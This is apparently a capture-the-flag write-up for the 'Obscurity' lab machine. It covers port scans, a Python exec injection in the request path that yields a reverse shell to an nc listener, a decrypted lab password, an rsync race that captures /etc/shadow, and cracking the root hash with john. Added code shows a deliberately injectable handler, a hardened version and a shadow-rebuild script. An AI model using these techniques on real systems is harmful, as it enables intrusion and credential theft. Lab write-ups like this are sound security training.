Initial Foothold
nmap -p- -T5 --open obscurity.htb
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 164.29 seconds
nmap -sV -sC -p 8080 obscurity.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-01 19:24 -05
Nmap scan report for obscurity.htb (10.10.10.168)
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
8080/tcp open http-proxy BadHTTPServer
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 02 Dec 2019 00:24:06
| Server: BadHTTPServer
| Last-Modified: Mon, 02 Dec 2019 00:24:06
| Content-Length: 4171
| Content-Type: text/html
| Connection: Closed
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>0bscura</title>
| <meta http-equiv="X-UA-Compatible" content="IE=Edge">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta name="keywords" content="">
| <meta name="description" content="">
| <!--
| Easy Profile Template
| http://www.templatemo.com/tm-467-easy-profile
| -->
| <!-- stylesheet css -->
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/templatemo-blue.css">
| </head>
| <body data-spy="scroll" data-target=".navbar-collapse">
| <!-- preloader section -->
| <!--
| <div class="preloader">
|_ <div class="sk-spinner sk-spinner-wordpress">
|_http-server-header: BadHTTPServer
|_http-title: 0bscura
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=12/1%Time=5DE459A8%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,10FC,"HTTP/1\.1\x20200\x20OK\nDate:\x20Mon,\x2002\x20Dec\x2020
SF:19\x2000:24:06\nServer:\x20BadHTTPServer\nLast-Modified:\x20Mon,\x2002\
SF:x20Dec\x202019\x2000:24:06\nContent-Length:\x204171\nContent-Type:\x20t
SF:ext/html\nConnection:\x20Closed\n\n<!DOCTYPE\x20html>\n<html\x20lang=\"
SF:en\">\n<head>\n\t<meta\x20charset=\"utf-8\">\n\t<title>0bscura</title>\
SF:n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=Edge\">\n\t<
SF:meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-s
SF:cale=1\">\n\t<meta\x20name=\"keywords\"\x20content=\"\">\n\t<meta\x20na
SF:me=\"description\"\x20content=\"\">\n<!--\x20\nEasy\x20Profile\x20Templ
SF:ate\nhttp://www\.templatemo\.com/tm-467-easy-profile\n-->\n\t<!--\x20st
SF:ylesheet\x20css\x20-->\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/boo
SF:tstrap\.min\.css\">\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/font-a
SF:wesome\.min\.css\">\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/templa
SF:temo-blue\.css\">\n</head>\n<body\x20data-spy=\"scroll\"\x20data-target
SF:=\"\.navbar-collapse\">\n\n<!--\x20preloader\x20section\x20-->\n<!--\n<
SF:div\x20class=\"preloader\">\n\t<div\x20class=\"sk-spinner\x20sk-spinner
SF:-wordpress\">\n")%r(HTTPOptions,10FC,"HTTP/1\.1\x20200\x20OK\nDate:\x20
SF:Mon,\x2002\x20Dec\x202019\x2000:24:06\nServer:\x20BadHTTPServer\nLast-M
SF:odified:\x20Mon,\x2002\x20Dec\x202019\x2000:24:06\nContent-Length:\x204
SF:171\nContent-Type:\x20text/html\nConnection:\x20Closed\n\n<!DOCTYPE\x20
SF:html>\n<html\x20lang=\"en\">\n<head>\n\t<meta\x20charset=\"utf-8\">\n\t
SF:<title>0bscura</title>\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20co
SF:ntent=\"IE=Edge\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=dev
SF:ice-width,\x20initial-scale=1\">\n\t<meta\x20name=\"keywords\"\x20conte
SF:nt=\"\">\n\t<meta\x20name=\"description\"\x20content=\"\">\n<!--\x20\nE
SF:asy\x20Profile\x20Template\nhttp://www\.templatemo\.com/tm-467-easy-pro
SF:file\n-->\n\t<!--\x20stylesheet\x20css\x20-->\n\t<link\x20rel=\"stylesh
SF:eet\"\x20href=\"css/bootstrap\.min\.css\">\n\t<link\x20rel=\"stylesheet
SF:\"\x20href=\"css/font-awesome\.min\.css\">\n\t<link\x20rel=\"stylesheet
SF:\"\x20href=\"css/templatemo-blue\.css\">\n</head>\n<body\x20data-spy=\"
SF:scroll\"\x20data-target=\"\.navbar-collapse\">\n\n<!--\x20preloader\x20
SF:section\x20-->\n<!--\n<div\x20class=\"preloader\">\n\t<div\x20class=\"s
SF:k-spinner\x20sk-spinner-wordpress\">\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.66 seconds
Fuzzing with Burp Intruder confirmed that the script mentioned on the landing page, SuperSecureServer.py, is present on the server.
With the help of https://github.com/swisskyrepo/PayloadsAllTheThings the commands to inject were worked out: the script hands the path variable to exec, so a crafted request path runs arbitrary Python with the privileges of the server process.
On the attacker machine start a listener:
nc -lvp 4444
then send the injected command from the browser to get the reverse shell.
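The injection described above, as an added example that is not the box's own SuperSecureServer.py (the write-up does not show its code): a handler that interpolates the request path into a Python statement and exec()s it, beside a replacement that treats the path as data only. The template string, the /var/www document root and the character allowlist are assumptions made for this illustration, and the payload sets a variable instead of spawning a shell so the block is safe to run.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed illustration of the exec-on-path pattern; NOT the real server's
# template, which the write-up does not reproduce.
TEMPLATE = "output = 'Document: {}'"

# Allowlist for the hardened handler (assumption: plain file names and slashes).
SAFE_PATH = re.compile(r"[A-Za-z0-9._/-]*")

DOCROOT = "/var/www"  # hypothetical document root


def vulnerable_handler(path: str, env: dict) -> str:
    """Interpolate the request path into a statement and exec() it.

    A path such as  ';hit=True;#  closes the string literal, runs hit=True as a
    statement and comments out the trailing quote.  Deliberately unsafe: this is
    the bug under discussion, not something to copy.
    """
    exec(TEMPLATE.format(path), env)  # noqa: S102
    return env.get("output", "")


def resolve_document(request_path: str, docroot: str = DOCROOT) -> str:
    """Hardened replacement: the path is data, never code.

    1. percent-decode once and drop any query string / fragment
    2. reject anything outside a small allowlist (kills quote/semicolon/hash)
    3. normalise '..' segments relative to '/', so traversal cannot leave docroot
    4. confirm the resulting path still lives under docroot
    """
    path = unquote(urlsplit(request_path).path)
    if not SAFE_PATH.fullmatch(path):
        raise ValueError("rejected: unexpected characters in request path")
    norm = posixpath.normpath("/" + path.lstrip("/"))
    if norm == "/":
        norm = "/index.html"
    full = posixpath.join(docroot, norm.lstrip("/"))
    if not full.startswith(docroot.rstrip("/") + "/"):
        raise ValueError("rejected: path escapes the document root")
    return full


def hardened_handler(request_path: str) -> str:
    """Same observable result as the vulnerable handler for legitimate paths."""
    return "Document: " + resolve_document(request_path)


if __name__ == "__main__":
    env: dict = {}
    print(vulnerable_handler("/index.html", env))
    vulnerable_handler("';hit=True;#", env)
    print("injected statement ran:", env.get("hit"))
    print(hardened_handler("/../../etc/passwd"))
    try:
        hardened_handler("';hit=True;#")
    except ValueError as exc:
        print(exc)
```

The same quote-semicolon-hash breakout carries any statement, which is how the reverse shell back to the nc listener is delivered; the hardened version never evaluates the path, so the allowlist and the docroot check are the only two places the request can be rejected.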
Getting User
From the www-data shell, robert's home directory holds the encryption tool SuperSecureCrypt.py and an encrypted password reminder. Decrypting the reminder with the key alexandrovich:
www-data@obscure:/tmp$ python3 /home/robert/SuperSecureCrypt.py -d -i /home/robert/passwordreminder.txt -o out.txt -k alexandrovich
################################
#          BEGINNING           #
#    SUPER SECURE ENCRYPTOR    #
################################
############################
#        FILE MODE         #
############################
Opening file /home/robert/passwordreminder.txt...
Decrypting...
Writing to out.txt...
www-data@obscure:/tmp$ cat out.txt
SecThruObsFTW
www-data@obscure:/tmp$
SecThruObsFTW is robert's password, which gives a shell as robert.
Prepare the capture: create /tmp/SSH and run a loop that keeps copying whatever appears there into robert's home, so files that exist in /tmp/SSH only briefly are preserved.
mkdir /tmp/SSH
robert@obscure:~/SSH$ cat /tmp/test.sh
#!/bin/bash
# Mirror /tmp/SSH into /home/robert as fast as possible; anything created in
# /tmp/SSH, however short-lived, ends up under /home/robert/SSH/.
while true; do
    rsync -a /tmp/SSH /home/robert
done
Getting Root
With the loop running, execute the Better* script and capture /etc/shadow. The script writes each field of the shadow entries on its own line, and the copy survives in ~/SSH (here as ApfWEyAm):
robert@obscure:~/SSH$ cat ApfWEyAm
root
$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1
18226
0
99999
7
robert
$6$fZZcDG7g$lfO35GcjUmNs3PSjroqNGZjH35gN4KjhHbQxvWO0XU.TCIHgavst7Lj8wLF/xQ21jYW5nD66aJsvQSP/y1zbH/
18163
0
99999
7
With the captured hashes saved as shadow alongside passwd:
unshadow passwd shadow > crack
john --wordlist=../../wordlist/rockyou.txt crack
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
mercedes (root)
John fell back to the generic crypt(3) format here, which calls the system crypt() for every guess; on a jumbo build, --format=sha512crypt selects john's own $6$ implementation and is considerably faster.
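The captured file above lists one shadow field per line, so it has to be turned back into colon-separated shadow lines before unshadow will accept it. As an added example (not part of the write-up), the block below rebuilds the shadow file from that dump, decodes the $6$ entries (scheme, salt, last-change date) and performs the merge that unshadow(8) does. The two shadow entries are taken from the page; the /etc/passwd lines are constructed for the illustration (uids and shells assumed).

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import List, Optional

# One-field-per-line dump as captured from the Better* script (fields as shown
# on the page; blank lines for the empty trailing fields are tolerated).
DUMP = """root
$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1
18226
0
99999
7
robert
$6$fZZcDG7g$lfO35GcjUmNs3PSjroqNGZjH35gN4KjhHbQxvWO0XU.TCIHgavst7Lj8wLF/xQ21jYW5nD66aJsvQSP/y1zbH/
18163
0
99999
7
""".splitlines()

# Constructed /etc/passwd lines (not from the page; uids and shells assumed).
PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "robert:x:1000:1000:robert:/home/robert:/bin/bash",
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
]

SHADOW_FIELDS = 9
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


def rebuild_shadow(lines: List[str]) -> List[str]:
    """Reassemble a one-field-per-line dump into colon-separated shadow lines.

    A new entry starts at a line immediately followed by a crypt(3) hash (a
    line beginning with '$'); every other line belongs to the current entry.
    Entries are padded (or stripped of surplus blanks) to the 9 shadow fields.
    """
    records: List[List[str]] = []
    i = 0
    while i < len(lines):
        if i + 1 < len(lines) and lines[i + 1].startswith("$"):
            records.append([lines[i], lines[i + 1]])
            i += 2
        elif records:
            records[-1].append(lines[i])
            i += 1
        else:
            i += 1  # stray line before the first entry
    out = []
    for fields in records:
        while len(fields) > SHADOW_FIELDS and fields[-1] == "":
            fields.pop()
        fields += [""] * (SHADOW_FIELDS - len(fields))
        out.append(":".join(fields))
    return out


@dataclass
class ShadowEntry:
    name: str
    hashed: str
    last_change: Optional[date]  # field 3 is days since 1970-01-01
    min_days: Optional[int]
    max_days: Optional[int]
    warn_days: Optional[int]

    @property
    def scheme(self) -> str:
        parts = self.hashed.split("$")
        if len(parts) >= 4 and parts[0] == "":
            return CRYPT_IDS.get(parts[1], "unknown-$" + parts[1])
        return "locked-or-legacy"

    @property
    def salt(self) -> str:
        parts = self.hashed.split("$")
        return parts[-2] if len(parts) >= 4 else ""


def _opt_int(s: str) -> Optional[int]:
    return int(s) if s else None


def parse_shadow_line(line: str) -> ShadowEntry:
    f = line.split(":")
    if len(f) != SHADOW_FIELDS:
        raise ValueError(f"expected {SHADOW_FIELDS} fields, got {len(f)}: {line!r}")
    last = date(1970, 1, 1) + timedelta(days=int(f[2])) if f[2] else None
    return ShadowEntry(f[0], f[1], last, _opt_int(f[3]), _opt_int(f[4]), _opt_int(f[5]))


def unshadow(passwd: List[str], shadow: List[str]) -> List[str]:
    """What unshadow(8) does: copy each shadow hash into passwd's password
    field, yielding the input format john expects."""
    hashes = {e.name: e.hashed for e in map(parse_shadow_line, shadow)}
    merged = []
    for line in passwd:
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"bad passwd line: {line!r}")
        f[1] = hashes.get(f[0], f[1])
        merged.append(":".join(f))
    return merged


if __name__ == "__main__":
    shadow = rebuild_shadow(DUMP)
    for e in map(parse_shadow_line, shadow):
        print(f"{e.name}: {e.scheme}, salt={e.salt}, last changed {e.last_change}")
    print("\n".join(unshadow(PASSWD, shadow)))
```

The last-change dates fall out of field 3 (days since the epoch), which is a quick sanity check that the rebuilt lines are aligned correctly; a misgrouped dump would typically produce an absurd date or a non-numeric field and fail in parse_shadow_line rather than silently feed john a corrupt hash.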